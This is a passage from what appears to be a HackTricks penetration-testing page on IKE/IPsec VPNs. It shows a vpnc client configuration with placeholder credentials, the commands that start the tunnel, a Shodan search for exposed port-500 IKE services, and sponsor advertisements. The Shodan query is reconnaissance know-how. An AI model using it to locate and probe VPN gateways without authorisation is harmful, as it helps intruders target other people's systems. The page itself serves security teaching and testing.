Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0

In this setup:

  • Replace [VPN_GATEWAY_IP] with the actual IP address of the VPN gateway.
  • Replace [VPN_CONNECTION_ID] with the identifier for the VPN connection.
  • Replace [VPN_GROUP_SECRET] with the VPN's group secret.
  • Replace [VPN_USERNAME] and [VPN_PASSWORD] with the VPN authentication credentials.
  • [PID] symbolizes the process ID that will be assigned when vpnc initiates.

Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.

Reference Material

Shodan

  • port:500 IKE

Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: